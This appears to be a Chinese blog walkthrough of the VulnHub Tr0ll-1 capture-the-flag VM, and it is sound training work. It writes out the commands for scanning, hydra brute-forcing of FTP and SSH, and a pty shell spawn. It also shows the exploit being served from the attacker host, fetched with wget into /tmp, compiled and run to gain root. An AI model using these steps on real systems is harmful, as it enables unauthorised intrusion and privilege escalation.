前言
Tr0ll的灵感来源于OSCP实验室内机器的不断拖动。
目标很简单,获取root并从/root目录中获取Proof.txt。
不适合那些容易受挫的人!公平的警告,前方有巨魔!
靶机环境
kali 192.168.31.153
Tr0ll-1 192.168.31.35
靶机下载地址:https://www.vulnhub.com/entry/tr0ll-1,100/
渗透实战
环境搭建成功,使用nmap扫描网段ip探测存活主机
nmap 192.168.31.0/24
浏览器访问主机http://192.168.31.35,发现是一个暴走图
查看页面js源码也是没有任何线索,正常思路走就是对主机web页面和ip进行信息收集
首先我用nmap详细扫描ip的端口信息
nmap 192.168.31.35 -sV -O -p- //扫描全端口信息,版本信息,操作系统
此处发现了21 22 80端口 且操作系统是ubuntu的linux系统,先放一边,接下来就是扫描文件目录
python3 dirsearch.py -u http://192.168.31.35/ -e*
发现了一个文件robots.txt,添加访问路径查看有一个/secret目录,访问又是一个暴走图并没有有用的线索
现在只能从端口入手,首先尝试ftp端口,利用hydra爆破用户名密码
hydra -L user.txt -P password.txt 192.168.31.35 -s 21 ftp
得到了用户名为 Anonymous 和一堆弱密码(这里由于爆破时间有点长,只截取了一部分)
但是我看网上可以尝试无密码直接登录成功
ftp 192.168.31.35
回车完显示需要输入用户名,再回车一次
然后直接登录
回车完发现了有一串英文,意思是此FTP服务器仅为匿名服务器,可以使用图中的英文anonymous无密码登录,为什么使用这个英文呢,是因为目前没有其他线索了,我尝试了其他用户名又是不可以
紧接着就是查找新线索,使用ls查看文件,发现有一个流量包lol.pcap
在ftp服务器里使用 get lol.pcap将流量包下载到本地
get lol.pcap
使用wireshark查看流量包
右键点击第一个流量包,追踪TCP流,发现提示是将一些二进制代码放在secret_stuff.txt文本里
修改刚刚圈出来在地址框的代码,把0改到2,看到提示说找到一个sup3rs3cr3tdirlol,看到这串字符有dir字样,猜测应该是一个文件或者文件夹
到浏览器访问看看http://192.168.31.35/sup3rs3cr3tdirlol,发现也是一个目录,里边还有一个未知文件 roflmao
使用kali的wget命令下载到本地查看
wget http://192.168.31.35/sup3rs3cr3tdirlol/roflmao
可以利用kali的文件解析命令获取线索,这里我使用strings命令
strings roflmao
得到了一堆提示,其中有一段英文提示Find address 0x0856BF to proceed,查找0x0856BF这个地址,再次利用浏览器访问http://192.168.31.35/0x0856BF查看
又是一个目录,一个套着一个,这谁猜得到哦…
查看两个目录,发现了是一个用户名字典和密码字典
到这突然意识到,应该是ssh的用户和密码,再次使用hydra爆破ssh端口
hydra -L which_one_lol.txt -p Pass.txt 192.168.31.35 ssh
一开始使用的是密码文本的参数-P 但是多次爆破均没用,然后换了-p发现密码居然是Pass.txt,又是一个坑
登录ssh
ssh overflow@192.168.31.35
Pass.txt
直接获取到webshell了,接着就是提权getshell
使用python获取linux框架shell
python -c 'import pty;pty.spawn("/bin/bash")'
开始内网信息收集,查看内核版本信息
cat /proc/version
发现是Linux ubuntu 3.13.0版本,老规矩,浏览器搜索漏洞poc或者使用kali的searchsploit命令查看poc脚本
这里为了方便演示,我使用searchsploit命令
searchsploit Linux ubuntu 3.13.0
使用第一个c脚本,先将脚本复制到/root下方便操作,再者使用cat查看脚本如何使用
find / -name 37292.c
cp /usr/share/exploitdb/exploits/linux/local/37292.c 37292.c
ls
cat 37292.c
脚本提示需要下载到靶机,使用gcc编译再执行,python3开启http服务,在靶机后台wget下载脚本,但是此处又有一个坑,发现后台并不能随意下载
kali:
python3 -m http.server 8989
Tr0ll-1:
find / -writable 2>/dev/null //查看可写入权限的文件
发现有一个临时目录/tmp可写入,进入tmp文件夹,将脚本下载到tmp
cd /tmp
wget http://192.168.31.153:8989/37292.c
下载完毕,使用gcc编译37292.c
gcc 37292.c -o shell
-o:将编译完的exp存储在自行定义的文件里
chmod +x shell //添加执行权限
./shell //开始执行
id
cd /root
cat proof.txt
总结
1.从nmap扫描到端口再到hydra破解端口
2.使用wireshark流量分析lol.pcap包获取线索
3.strings解析二进制文件查找提示信息
4.利用已知内核漏洞提权getshell
5.最后这个靶机在查看到有很多地方可以写入权限,方法不止一个,但是我这里仅展示最简单的提权方法:利用已知漏洞获取权限
其他拓展思路可以参考此博客:https://blog.csdn.net/weixin_44807430/article/details/128707254
服务器托管,北京服务器托管,服务器租用 http://www.fwqtg.net
机房租用,北京机房租用,IDC机房托管, http://www.fwqtg.net